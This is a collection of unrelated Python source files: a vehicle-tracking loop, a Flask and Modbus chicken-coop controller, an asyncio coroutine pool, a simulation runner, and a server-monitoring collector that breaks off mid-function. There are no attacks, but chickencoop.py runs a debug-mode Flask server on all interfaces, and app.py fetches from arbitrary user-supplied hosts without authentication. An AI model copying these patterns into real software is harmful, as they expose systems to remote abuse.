if self.frameCount > 0 and (self.frameCount % fps == 0 or self.frameCount == fps - 1):
#print("FRAME " + str(self.frameCount) + " VIF")
#thread = Thread(target=predict(last_30_frames,trackers))
#thread.start()
#print("error")
#vif(trackers, frame_width, frame_height, frame)
t = time()
# thread = Thread(target=process(trackers,last_30_frames))
# thread.start()
process(trackers,last_30_frames)
print(time() - t)
if self.frameCount > 16 and self.frameCount % hfps == 0 and self.frameCount % fps != 0:
# print("FRAME " + str(self.frameCount) + " VIF")
# thread = Thread(target=predict(last_30_frames,trackers))
# thread.start()
# print("error")
# vif(trackers, frame_width, frame_height, frame)
t = time()
# thread = Thread(target=process(delayed_trackers, last_delayed_30_frames))
# thread.start()
#
process(delayed_trackers, last_delayed_30_frames)
print(time() - t)
if self.frameCount > 0 and self.frameCount % hfps == 0 and self.frameCount % fps != 0:
# print("YOLO CALLED in frame no. " + str(self.frameCount))
# clear earlier trackers
delayed_trackers = []
bboxes = []
last_delayed_30_frames = []
img = Image.fromarray(frame)
# detect vehicles
if self.readFile:
# From files
bboxes = fileBoxes[self.frameCount]
elif not self.selectYOLO:
# Khaled
img, bboxes = self.yolo.detect_image(img)
else:
# Roba
bboxes = Yolo_image(np.float32(img), model)
for i, bbox in enumerate(bboxes):
label = bbox[0]
# accuracy = bbox[5]
xmin = int(bbox[1])
xmax = int(bbox[2])
ymin = int(bbox[3])
ymax = int(bbox[4])
# can limit this part to cars and trucks only later
# cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), (0, 0, 255))
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
self.trackerId += 1
# no need for frame_width and frame_height
if xmax < frame_width and ymax < frame_height:
tr = Tracker(frame_gray, (xmin, ymin, xmax, ymax), frame_width, frame_height,
self.trackerId,tracker_type)
delayed_trackers.append(tr)
elif xmax < frame_width and ymax >= frame_height:
tr = Tracker(frame_gray, (xmin, ymin, xmax, frame_height - 1), frame_width, frame_height,
self.trackerId,tracker_type)
delayed_trackers.append(tr)
elif xmax >= frame_width and ymax < frame_height:
tr = Tracker(frame_gray, (xmin, ymin, frame_width - 1, ymax), frame_width, frame_height,
self.trackerId,tracker_type)
delayed_trackers.append(tr)
else:
tr = Tracker(frame_gray, (xmin, ymin, frame_width - 1, frame_height - 1), frame_width,
frame_height, self.trackerId,tracker_type)
delayed_trackers.append(tr)
else:
#print("updating trackers, frame no. " + str(self.frameCount) + "...")
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#print(len(trackers))
# updating trackers
for i, tracker in enumerate(delayed_trackers):
left, top, right, bottom = tracker.update(frame_gray)
# radian = tracker.getCarAngle() * (pi / 180)
# radian = 0
#
# #left = left * math.cos(radian) - top * math.sin(radian)
# #right = right * math.cos(radian) - bottom * math.sin(radian)
# #top = left * math.sin(radian) + top * math.cos(radian)
# #bottom = right * math.sin(radian) + bottom * math.cos(radian)
#
left_future, top_future, right_future, bottom_future = tracker.futureFramePosition()
#
# if left > 0 and top > 0 and right < frame_width and bottom < frame_height:
# if tracker.isAboveSpeedLimit():
# cv2.rectangle(frame, (int(left), int(top)),(int(right), int(bottom)), (0, 0, 255)) #B G R
# else:
# cv2.rectangle(frame, (int(left), int(top)),(int(right), int(bottom)), (255, 0, 0))
#
#
#
#
# #draw_str(frame, (left, bottom + 64), 'Max Speed: %.2f' % tracker.getMaxSpeed())
# #draw_str(frame, (left, bottom + 16), 'Avg Speed: %.2f' % tracker.getAvgSpeed())
# #draw_str(frame, (left, bottom + 96), 'Cur Speed: %.2f' % tracker.getCurrentSpeed())
# #draw_str(frame, (left, bottom + 112), 'Area Size: %.2f' % tracker.getCarSizeCoefficient())
# #draw_str(frame, (left, bottom + 32), 'Moving Angle: %.2f' % tracker.getCarAngle())
#
# if left_future > 0 and top_future > 0 and right_future < frame_width and bottom_future < frame_height:
# cv2.rectangle(frame, (int(left_future), int(top_future)), (int(right_future), int(bottom_future)), (0, 255, 0))
# Call YOLO
if self.frameCount % fps == 0 or self.frameCount == 0:
#print("YOLO CALLED in frame no. " + str(self.frameCount))
# clear earlier trackers
trackers = []
bboxes = []
last_30_frames = []
img = Image.fromarray(frame)
# detect vehicles
if self.readFile:
# From files
bboxes = fileBoxes[self.frameCount]
elif not self.selectYOLO:
# Khaled
img, bboxes = self.yolo.detect_image(img)
else:
# Roba
bboxes = Yolo_image(np.float32(img), model)
for i, bbox in enumerate(bboxes):
label = bbox[0]
# accuracy = bbox[5]
xmin = int(bbox[1])
xmax = int(bbox[2])
ymin = int(bbox[3])
ymax = int(bbox[4])
# can limit this part to cars and trucks only later
# cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), (0, 0, 255))
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
self.trackerId +=1
# no need for frame_width and frame_height
if xmax < frame_width and ymax < frame_height:
tr = Tracker(frame_gray, (xmin, ymin, xmax, ymax), frame_width, frame_height,self.trackerId,tracker_type)
trackers.append(tr)
elif xmax < frame_width and ymax >= frame_height:
tr = Tracker(frame_gray, (xmin, ymin, xmax, frame_height - 1), frame_width, frame_height,self.trackerId,tracker_type)
trackers.append(tr)
elif xmax >= frame_width and ymax < frame_height:
tr = Tracker(frame_gray, (xmin, ymin, frame_width - 1, ymax), frame_width, frame_height,self.trackerId,tracker_type)
trackers.append(tr)
else:
tr = Tracker(frame_gray, (xmin, ymin, frame_width - 1, frame_height - 1), frame_width, frame_height,self.trackerId,tracker_type)
trackers.append(tr)
else:
#print("updating trackers, frame no. " + str(self.frameCount) + "...")
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#print(len(trackers))
# updating trackers
for i, tracker in enumerate(trackers):
left, top, right, bottom = tracker.update(frame_gray)
radian = tracker.getCarAngle() * (pi / 180)
radian = 0
#left = left * math.cos(radian) - top * math.sin(radian)
#right = right * math.cos(radian) - bottom * math.sin(radian)
#top = left * math.sin(radian) + top * math.cos(radian)
#bottom = right * math.sin(radian) + bottom * math.cos(radian)
left_future, top_future, right_future, bottom_future = tracker.futureFramePosition()
if left > 0 and top > 0 and right < frame_width and bottom < frame_height:
if tracker.isAboveSpeedLimit():
cv2.rectangle(frame, (int(left), int(top)),(int(right), int(bottom)), (0, 0, 255)) #B G R
else:
cv2.rectangle(frame, (int(left), int(top)),(int(right), int(bottom)), (255, 0, 0))
#draw_str(frame, (left, bottom + 64), 'Max Speed: %.2f' % tracker.getMaxSpeed())
draw_str(frame, (left, bottom + 16), 'Avg Speed: %.2f' % tracker.getAvgSpeed())
#draw_str(frame, (left, bottom + 96), 'Cur Speed: %.2f' % tracker.getCurrentSpeed())
#draw_str(frame, (left, bottom + 112), 'Area Size: %.2f' % tracker.getCarSizeCoefficient())
#draw_str(frame, (left, bottom + 32), 'Moving Angle: %.2f' % tracker.getCarAngle())
if left_future > 0 and top_future > 0 and right_future < frame_width and bottom_future < frame_height:
cv2.rectangle(frame, (int(left_future), int(top_future)), (int(right_future), int(bottom_future)), (0, 255, 0))
# sleep(0.02)
#cv2.namedWindow("result", cv2.WINDOW_NORMAL)
cum_time += time() - t
cv2.imshow("result", frame)
last_30_frames.append(new_frame)
last_delayed_30_frames.append(new_frame)
if self.frameCount %fps == 0:
print(self.frameCount/cum_time)
# increment number of frames
self.frameCount += 1
ch = cv2.waitKey(10)
if ch == ord(' '):
paused = not paused
print(self.trackerId)
if __name__ == '__main__':
# m = MainFlow(None, select=False)
# m.run('videos/1500.mp4')
m = MainFlow(None, select=False)
# m.run('videos/1508.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1516.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1521.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1528.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1529.mp4')
# m = MainFlow(None, select=False)
m.run('videos/1533.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1534.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/Easy.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1559.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1563.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1566.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1537.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1506.mp4')
# m = MainFlow(None, select=False) #but have issue in the yolo file
# m.run('videos/1513.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1518.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1528.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1543.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1503.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1517.mp4')
#
m = MainFlow(None, select=False)
# m.run('videos/1601.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1561.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1562.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1564.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1565.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/normal1.mp4')
# for i in range(1543,1545):
# print("F")
# m = MainFlow(None, select=False)
# m.run('videos/'+str(i)+'.mp4')
|
chickencoop.py
|
#To use this program run the following from admin command prompt:
#pip install flask pymodbus
#
from flask import Flask, render_template, request
import os.path
import requests
import random
import pickle
import atexit
from threading import Thread, Lock, Event
import time
import datetime
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
from pymodbus.exceptions import ModbusIOException
import logging
ioStatus = {'tempC':0.0,
'heaterPctCmd':0,
'heaterPctOut':0,
'lightPctCmd':0,
'lightPctOut':0,
'doorCmd':0,
'doorStatus':0}
ioStatusLock = Lock()
stopNow = Event()
#Set up logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
#Set up Modbus client to talk to Arduino. Be sure to use port by ID so we always
#get the right one (it can switch from /dev/ttyUSB0 to /dev/ttyUSB1 without warning)
client = ModbusClient(method='rtu',
port='/dev/serial/by-id/usb-FTDI_FT232R_USB_UART_AH05HBFT-if00-port0',
timeout=1,
baudrate=57600,
stopbits = 1,
bytesize = 8,
parity = 'N')
clientLock = Lock()
client.connect()
weather = None
#Set up web server
app = Flask(__name__)
def backgroundLoop():
log.info("Background loop started.")
while not stopNow.wait(1):
doModbus()
def weatherLoop():
global weather
log.info("Weather thread started")
weather = getWeather()
while not stopNow.wait(600):
weather = getWeather()
def doorCommand(number):
pass
def doorStatus():
return 0
#def isItSunrise():
#global sunriseTime
#sunriseTime = datetime.datetime.strptime(getSunrise(), '%H:%M %p').time()
def saveSettings():
pickle.dump( settings, open( "save.p", "wb" ) )
def loadSettings():
if os.path.isfile("save.p"):
log.info("loading settings from save.p")
return pickle.load( open( "save.p", "rb" ) )
else:
log.info("loading default settings")
return {
'WOEID' : "2396147"
}
# Lookup WOEID via http://weather.yahoo.com.
settings = loadSettings()
atexit.register(saveSettings)
def getWeather():
baseurl = "https://query.yahooapis.com/v1/public/yql?q="
yql_query = "select astronomy, item.condition from weather.forecast where woeid=" + settings['WOEID']
yql_url = baseurl + yql_query + "&format=json"
r = requests.get(yql_url)
if r.status_code != 200:
#There was a problem
return None
#
return r.json()['query']['results']['channel']
def getOutsideCondition():
return weather['item']['condition']['text']
def getInternalTemperature():
with ioStatusLock:
#We're thread protected in here
t = ioStatus['tempC']
return t
def getExternalTemperature():
return int(weather['item']['condition']['temp'])
def getSunrise():
return weather['astronomy']['sunrise']
def getSunset():
return weather['astronomy']['sunset']
#Modbus memory map for communication with slave
#0 TEMPC10, //0-600C * 10 = degrees C x 10
#1 HEATER_PCT_CMD, //0-100%
#2 HEATER_PCT_OUT, //0-100%
#3 LIGHT_PCT_CMD, //0-100%
#4 LIGHT_PCT_OUT, //0-100%
#5 DOOR_CMD,
#6 DOOR_STATUS,
#7 TOTAL_ERRORS,
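# doModbus() below reads registers 0-7 in one request; setHeaterPct(), setLightPct()
# and setDoor() write the command registers 1, 3 and 5 from this map.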
def doModbus():
try:
#Read 8 holding registers from address 0
with clientLock:
#We're thread protected in here
rr = client.read_holding_registers(0, 8, unit=1)
#Make sure the read was successful
assert(rr.function_code < 0x80)
with ioStatusLock:
#We're thread protected in here
#Copy the read values
ioStatus['tempC'] = rr.registers[0]/10.0
ioStatus['heaterPctOut'] = rr.registers[2]
ioStatus['lightPctOut'] = rr.registers[4]
ioStatus['doorStatus'] = rr.registers[6]
ioStatus['totalErrors'] = rr.registers[7]
except Exception as e:
log.exception(e)
#Sets ioStatus key/value pair and writes to specified Modbus register
def writeRegister(key, value, addr):
try:
with ioStatusLock:
#We're thread protected in here
ioStatus[key] = value
#Write the register
with clientLock:
#We're thread protected in here
rq = client.write_register(addr,value,unit=1)
assert(rq.function_code < 0x80)
except Exception as e:
log.exception(e)
def setHeaterPct(value):
writeRegister('heaterPctCmd',value,1)
def setLightPct(value):
writeRegister('lightPctCmd',value,3)
def setDoor(value):
writeRegister('doorCmd',value,5)
@app.route("/", methods=['GET', 'POST'])
def hello():
with ioStatusLock:
templateData = {
'outsidecondition' : getOutsideCondition(),
'internaltemperature': "{}".format(ioStatus['tempC']),
'externaltemperature' : "{}".format(getExternalTemperature()),
'sunrise': getSunrise(),
'sunset': getSunset(),
'doorStatus': ioStatus['doorStatus'],
'heaterPctOut': ioStatus['heaterPctOut'],
'lightPctOut': ioStatus['lightPctOut'],
'title' : 'The Cutting Coop'
}
#Check button presses
for s in request.values:
app.logger.info(s)
if 'doorOpen' in request.values:
app.logger.info("Button clicked: Open door")
setDoor(1)
elif 'doorClose' in request.values:
app.logger.info("Button clicked: Close door")
setDoor(2)
return render_template('main.html', **templateData)
if __name__ == "__main__":
t = Thread(target=backgroundLoop)
w = Thread(target=weatherLoop)
w.start()
t.start()
app.run(host='0.0.0.0', port=8080, debug=True, use_reloader=False)
#All done
stopNow.set()
t.join()
w.join()
|
asyncPool.py
|
"""
asyncio 实现的协程池 asyncio为python原生支持
调用时需要引入
import asyncio
还有另外一个版本的实现 asyncPoolGevent 为 Gevent实现协程
"""
# -*- coding:utf-8 -*-
import asyncio
import queue
from concurrent.futures import ThreadPoolExecutor
class 协程池(object):
"""
1. 支持动态添加任务
2. 支持停止事件循环
3. 支持最大协程数:maxsize
4. 支持进度条
5. 实时获取剩余协程数
6. 支持阻塞协程,需要线程进行支持,注意设置线程池:pool_maxsize
"""
    def __init__(self, 协程数量=1, 线程池数量=None, loop=None):
        """
        Initialize the pool.
        :param loop: event loop object
        :param 协程数量: maximum number of concurrent coroutines, defaults to 1
        :param 线程池数量: thread pool size, defaults to the number of CPU cores
        """
        # Needed in Jupyter, otherwise asyncio raises an error:
        # import nest_asyncio
        # nest_asyncio.apply()
        # Task bookkeeping
        self._task, self._task_done_count, self._task_progress_list = self.task_create()
        # Event loop, loop thread and thread pool
        self._loop, self._loop_thread, self._thread_pool = self.start_loop(
            loop,
            pool_maxsize=线程池数量)
        # Semaphore limiting the number of concurrent coroutines
        self.semaphore = asyncio.Semaphore(协程数量, loop=self._loop)
    @staticmethod
    def task_create():
        """
        Create the task bookkeeping objects.
        :return:
        """
        # FIFO queue; it doubles as the task group used to block until all tasks
        # are done, and its emptiness tells the loop when to stop
        task = queue.Queue()
        # Counter of completed tasks
        task_done_count = queue.Queue()
        # Storage for progress values (kept unique)
        task_progress_list = []
        return task, task_done_count, task_progress_list
    def task_add(self, item=1):
        """
        Add a task.
        :param item:
        :return:
        """
        self._task.put(item)
    def task_done(self, fn):
        """
        Future callback invoked when a task finishes;
        counts the completed task.
        :param fn:
        :return:
        """
        if fn:
            pass
        self._task.get()
        self._task.task_done()
        # Count the completed task
        self._task_done_count.put(1)
    def task_progress(self, total):
        """
        Task progress indicator.
        Only usable when the total number of tasks is known in advance.
        :param total: total number of tasks
        :return:
        """
        # Completed-task count; subtract the stop task from the tally
        count = self._task_done_count.qsize() - 1
        if count < 0:
            count = 0
        item = int(count / total * 100)
        if count == total:
            # All tasks finished
            self._task_progress_list.append(100)
        elif item not in self._task_progress_list:
            # Intermediate value
            self._task_progress_list.append(item)
        else:
            pass
        self._task_progress_list = list(set(self._task_progress_list))
        self._task_progress_list.sort()
        return self._task_progress_list[-1]
    def get_task(self):
        """
        Return the tasks registered on the event loop.
        :return:
        """
        task_list = asyncio.Task.all_tasks(loop=self._loop)
        # task_list = asyncio.all_tasks(loop=self._loop)
        return task_list
    def 等待(self):
        """
        Block until every submitted task has finished.
        :return:
        """
        self._task.join()
        # self._thread_pool.shutdown()
    @property
    def running(self):
        """
        Number of coroutines still pending.
        :return:
        """
        # Remaining task count; subtract the stop task from the tally
        count = self._task.qsize() - 1
        if count < 0:
            count = 0
        return count
    @staticmethod
    def _start_thread_loop(loop):
        """
        Run the event loop (the loop is passed in as an argument).
        :param loop:
        :return:
        """
        # Set the event loop for the current context
        asyncio.set_event_loop(loop)
        # Run the event loop forever
        loop.run_forever()
    async def _stop_thread_loop(self, loop_time=1):
        """
        Stop the event loop once the task queue is empty.
        :return:
        """
        while True:
            if self._task.empty():
                # Stop the event loop
                self._loop.stop()
                break
            await asyncio.sleep(loop_time)
    def start_loop(self, loop, pool_maxsize=None):
        """
        Run the event loop on a new worker thread.
        :param loop: event loop (a new one is created if None)
        :param pool_maxsize: thread pool size, defaults to the number of CPU cores
        :return:
        """
        # Get an event loop
        if not loop:
            loop = asyncio.new_event_loop()
        # Thread pool
        thread_pool = ThreadPoolExecutor(pool_maxsize)
        # Make it the loop's default executor
        loop.set_default_executor(thread_pool)
        # Alternative: run the loop in a dedicated daemon thread instead
        # from threading import Thread
        # thread_pool = Thread(target=self._start_thread_loop, args=(loop,))
        # thread_pool.setDaemon(True)
        # thread_pool.start()
        # Start the loop on one of the pool's worker threads
        thread_pool.submit(self._start_thread_loop, loop)
        return loop, thread_pool, thread_pool
    def stop_loop(self, loop_time=1):
        """
        Shut the loop down once the task queue is empty.
        :param loop_time:
        :return:
        """
        # Schedule the shutdown coroutine on the loop thread
        asyncio.run_coroutine_threadsafe(self._stop_thread_loop(loop_time), self._loop)
        # To cancel a single task instead:
        # task.cancel()
    def _close(self):
        """
        Close the event loop so it cannot be restarted.
        Calling this on a running loop raises:
        # RuntimeError: Cannot close a running event loop
        :return:
        """
        self._loop.close()
    def 释放线程(self, loop_time=1):
        """
        Release the loop thread (stop the event loop).
        :param loop_time:
        :return:
        """
        self.stop_loop(loop_time)
    async def async_semaphore_func(self, func):
        """
        Semaphore wrapper around a coroutine.
        :param func:
        :return:
        """
        async with self.semaphore:
            return await func
    async def async_thread_pool_func(self, block_func, *args, thread_pool=True):
        """
        Semaphore plus thread pool wrapper for blocking functions.
        loop: asyncio.AbstractEventLoop
        :param block_func: blocking function
        :param args: arguments
        :param thread_pool: whether to use the custom thread pool
        :return:
        """
        async with self.semaphore:
            if not thread_pool:
                # Default executor
                return await self._loop.run_in_executor(None, block_func, *args)
            # Custom thread pool
            future = await self._loop.run_in_executor(self._thread_pool, block_func, *args)
            # gather = await asyncio.gather(future)  # blocking
            # gather = await asyncio.wait(future)  # blocking
            return future
    def _submit(self, func, callback=None):
        """
        Non-blocking mode: submit a coroutine object to the event loop.
        :param func: coroutine object
        :param callback: callback function
        :return:
        """
        self.task_add()
        # Register the coroutine with the loop running in the worker thread.
        # Note: run_coroutine_threadsafe only works with a loop running in another thread.
        # future = asyncio.run_coroutine_threadsafe(func, self.loop)
        future = asyncio.run_coroutine_threadsafe(self.async_semaphore_func(func), self._loop)
        # Callbacks are invoked in the order they are added
        if callback:
            future.add_done_callback(callback)
        future.add_done_callback(self.task_done)
    def 投递任务(self, func, *args, 回调函数=None):
        """
        Non-blocking mode: submit an async function to the event loop.
        :param func: async function object
        :param args: arguments
        :param 回调函数: callback function
        :return:
        """
        self.task_add()
        # Register the coroutine with the loop running in the worker thread.
        # Note: run_coroutine_threadsafe only works with a loop running in another thread.
        # future = asyncio.run_coroutine_threadsafe(func, self.loop)
        future = asyncio.run_coroutine_threadsafe(self.async_semaphore_func(func(*args)), self._loop)
        # Callbacks are invoked in the order they are added
        if 回调函数:
            future.add_done_callback(回调函数)
        future.add_done_callback(self.task_done)
    def 投递任务2(self, func, *args, 回调函数=None):
        """
        Blocking mode: submit a blocking function, which is run in the thread pool.
        :param func: blocking function object
        :param args: arguments
        :param 回调函数: callback function
        :return:
        """
        self.task_add()
        # Register the coroutine with the loop running in the worker thread.
        # Note: run_coroutine_threadsafe only works with a loop running in another thread.
        # future = self._loop.run_in_executor(None, func)
        # future = asyncio.ensure_future(self._loop.run_in_executor(None, func))  # non-blocking
        future = asyncio.run_coroutine_threadsafe(
            self.async_thread_pool_func(func, *args),
            self._loop)
        # Callbacks are invoked in the order they are added
        if 回调函数:
            future.add_done_callback(回调函数)
        future.add_done_callback(self.task_done)
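# A minimal usage sketch (not part of the original module; the flow is assumed from
# the methods above, and asyncio.Semaphore(loop=...) implies Python <= 3.9):
if __name__ == '__main__':
    async def demo_task(n):
        # pretend to do some asynchronous work
        await asyncio.sleep(0.1)
        print('task', n, 'done')
    pool = 协程池(协程数量=5, 线程池数量=2)
    for i in range(10):
        # 投递任务 wraps func(*args) in the semaphore and schedules it on the loop thread
        pool.投递任务(demo_task, i)
    pool.等待()        # block until the internal task queue is drained
    pool.释放线程()    # ask the event loop to stop once the queue is empty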
|
run.py
|
"""Run a simulation from an existing WMT configuration."""
from __future__ import print_function
import os
import argparse
from ..slave import Slave
from ..env import WmtEnvironment
from cmt.component.model import Model
def run(path):
os.chdir(path)
import yaml
with open('model.yaml', 'r') as opened:
model = yaml.load(opened.read())
status_file = os.path.abspath(os.path.join(
model['driver'], '_time.txt'))
#status = TaskStatus(self.id, self.server, status_file)
#timer = threading.Thread(target=status)
#timer.start()
with open('components.yaml', 'r') as opened:
model = Model.load(opened.read())
#report('running', 'running model')
#model.go(file='model.yaml')
#report('running', 'finished')
def main():
import argparse
import traceback
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('path', help='Path to simulation directory')
parser.add_argument('--config', default=None,
help='WMT site configuration file')
parser.add_argument('--show-env', action='store_true',
help='print execution environment and exit')
parser.add_argument('--verbose', action='store_true',
help='Be verbose')
args = parser.parse_args()
env = WmtEnvironment.from_config(args.config)
if args.show_env:
print(str(env))
return
run(args.path)
|
app.py
|
# -*- coding: utf-8 -*-
from flask import Flask, jsonify, request
from configparser import ConfigParser
from warnings import filterwarnings
from urllib.request import urlopen
from threading import Thread
from logging import handlers
import logging
import pymysql
import pexpect
import json
import time
from bin.server_obj import Server
from bin.errorlog_obj import ErrorLog
import bin.db_management as db_management
# convert human sizes to bytes
def convert_bytes(byts):
    try:
        if byts.endswith('kb'):
            return int(byts[0:-2]) * 1024
        elif byts.endswith('mb'):
            return int(byts[0:-2]) * 1024 * 1024
        elif byts.endswith('gb'):
            return int(byts[0:-2]) * 1024 * 1024 * 1024
        else:
            raise IOError('Invalid input. Correct format: #kb/#mb/#gb like 10gb or 5mb')
    except ValueError:
        raise IOError('Invalid input. Correct format: #kb/#mb/#gb like 10gb or 5mb')
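# e.g. convert_bytes('512kb') -> 524288, convert_bytes('5mb') -> 5242880, convert_bytes('10gb') -> 10737418240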
# load config file
config = ConfigParser()
config.read('config.ini')
err_type = ''
log_file = ''
log_size_limit = ''
log_file_number_limit = 0
db_host = ''
db_port = 0
db_user = ''
db_pass = ''
db_name = ''
db_prefix = ''
interval_time = 0
flsk_host = ''
flsk_port = 0
try:
# log values
err_type = 'Log > Name'
log_file = config.get('Log', 'Name', fallback='agent.log')
err_type = 'Log > Size_limit'
log_size_limit = config.get('Log', 'Size_limit', fallback='5mb')
log_size_limit = convert_bytes(log_size_limit)
err_type = 'Log > File_Limit'
log_file_number_limit = config.getint('Log', 'File_Limit', fallback=10)
# database values
err_type = 'Storage > Host'
db_host = config.get('Storage', 'Host', fallback='localhost')
err_type = 'Storage > Port'
db_port = config.getint('Storage', 'Port', fallback=3306)
err_type = 'Storage > User'
db_user = config.get('Storage', 'User', fallback='root')
err_type = 'Storage > Password'
db_pass = config.get('Storage', 'Pass', fallback='password')
err_type = 'Storage > Database'
db_name = config.get('Storage', 'Database', fallback='agent')
err_type = 'Storage > Prefix'
db_prefix = config.get('Storage', 'Prefix', fallback='am')
# collector
err_type = 'Collector > Interval'
interval_time = config.getint('Collector', 'Interval', fallback=1)
# flask connection info
err_type = 'UI_Feeder > Host'
flsk_host = config.get('UI_Feeder', 'Host', fallback='0.0.0.0')
err_type = 'UI_Feeder > Port'
flsk_port = config.getint('UI_Feeder', 'Port', fallback=5001)
except IOError as e:
print('CONFIG ERROR: Unable to load values from \"{}\"! STACKTRACE: {}'.format(err_type, e.args[1]))
print('CONFIG ERROR: Force closing program...')
exit()
# prepare logging
try:
logger = logging.getLogger('AtomicMonitor Central-Manager')
logger.setLevel(logging.DEBUG)
logger.addHandler(handlers.RotatingFileHandler(log_file, maxBytes=log_size_limit,
backupCount=log_file_number_limit))
ch = logging.StreamHandler()
ch.setFormatter(logging.Formatter('%(asctime)s | %(levelname)-8s | %(topic)-5s | %(message)s'))
logger.addHandler(ch)
except IOError as e:
print('FILE ERROR: Unable to prepare log file! STACETRACE: {}'.format(e.args[1]))
print('FILE ERROR: Force closing program...')
exit()
# setup flask
app = Flask(__name__)
# prepare database connection
con = None
cur = None
filterwarnings('ignore', category=pymysql.Warning)
# ping test server
def ping_server(host):
    # ping server (decode output so string parsing below works on Python 3)
    result = pexpect.spawn('ping -c 1 {}'.format(host), encoding='utf-8')
    try:
        # skip the header line, then parse the ping time from the reply line
        result.readline()
        p = result.readline()
        time_ping = float(p[p.find('time=') + 5:p.find(' ms')])
        # ping time
        return time_ping
    except ValueError:
        # ping time
        return -1
# scrape data from each agent (server)
def scrape_data(interval):
while True:
# retrieve list of servers
servers = list()
try:
            # get list of servers
            cur.execute('SELECT * FROM {}_server'.format(db_prefix))
            for row in cur.fetchall():
                servers.append(Server(row[0], row[1], row[2], row[3], row[4], row[5]))
# go through each server and scrape data
for serv in servers:
ping_result = ping_server(serv.host)
                if ping_result != -1:
try:
# sniff up data from a server
with urlopen('http://{}:{}/'.format(serv.host, serv.port)) as url:
data = json.loads(url.read().decode())
# insert data to SQL db
db_management.insert_ping_data(serv.id, 1, ping_result)
if ping_result > 200:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'Slow ping response: {} ms'.format(ping_result))
# insert ram data to SQL db
db_management.insert_memory_data(logging, con, cur, serv.id, 1,
data['memory']['ram']['percent_used'],
data['memory']['ram']['used'],
data['memory']['ram']['total'],
data['memory']['swap']['percent_used'],
data['memory']['swap']['used'],
data['memory']['swap']['total'])
if data['memory']['ram']['percent_used'] >= 90:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High RAM usage: {}%'.format(
data['memory']['ram']['percent_used']))
# insert CPU data to SQL db
db_management.insert_cpu_data(logging, con, cur, serv.id, 1, data['cpu']['percent_used'])
if data['cpu']['percent_used'] >= 90:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High CPU usage: {}%'.format(data['cpu']['percent_used']))
# insert network data to SQL db
for net_nic in data['network']:
db_management.insert_net_data(logging, con, cur, serv.id, 1, net_nic['name'],
net_nic['mb_sent'], net_nic['mb_received'])
# insert load average data to SQL db
db_management.insert_load_data(logging, con, cur, serv.id, 1, data['load']['1min'],
data['load']['5min'], data['load']['15min'])
if data['load']['1min'] is not None:
if data['load']['1min'] > 1.00:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High 1m load usage: {}'.format(data['load']['1min']))
elif data['load']['5min'] > 1.00:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High 5m load usage: {}'.format(data['load']['5min']))
elif data['load']['15min'] > 1.00:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High 15m load usage: {}'.format(
data['load']['15min']))
# insert disk data to SQL db
for disk in data['disks']['list']:
db_management.insert_disk_data(logging, con, cur, serv.id, 1, disk['device'],
disk['percent_used'], disk['used'], disk['total'])
if disk['percent_used'] > 90:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High disk space usage: {}%'.format(
disk['percent_used']))
logging.info('Retrieved and logged data for server [{}]!'.format(serv.name),
extra={'topic': 'CM'})
                    except (IOError, pymysql.Error):
logging.error('Unable to access server [{}]! Please make sure the port is open on that '
'server!'.format(serv.name), extra={'topic': 'AGENT'})
else:
db_management.insert_ping_data(serv.id, 0)
db_management.insert_memory_data(serv.id, 0)
db_management.insert_cpu_data(serv.id, 0)
db_management.insert_net_data(serv.id, 0)
db_management.insert_load_data(serv.id, 0)
db_management.insert_disk_data(serv.id, 0)
db_management.insert_log_data(serv.name, 1, 'Server not responding to ping')
logging.warning('Server [{}] is not responding, skipping...'.format(serv.name),
extra={'topic': 'CM'})
except pymysql.Error as ex:
logging.error('Problem when trying to retrieve data from SQL database! STACKTRACE: {}'.format(ex.args[1]),
extra={'topic': 'SQL'})
logging.error('Force closing program...', extra={'topic': 'SQL'})
exit()
        time.sleep(interval)
# start Flask service: retrieve now status from a server
@app.route('/now/<hostname>/<port>')
def web_now_status(hostname, port):
ping_result = ping_server(hostname)
    if ping_result != -1:
        # query the agent process on the target host
with urlopen('http://{}:{}/now'.format(hostname, port)) as url:
r = json.loads(url.read().decode())
# get data
ram_percent = r['ram']['percent_used']
cpu_percent = r['cpu']['percent_used']
boot_time = r['boot']['start_timestamp']
disk_io = r['disk_io']
# create json data
json_data = {
'status': 'online',
'ping': ping_result,
'ram_percent': ram_percent,
'cpu_percent': cpu_percent,
'boot_time': boot_time,
'disk_io': disk_io
}
logging.info('Retrieved now status for host {}:{} for IP: {}'.format(hostname, port, request.remote_addr),
extra={'topic': 'CM'})
# print json data
return jsonify(json_data)
else:
# create json data
json_data = {
'status': 'offline'
}
# print json data
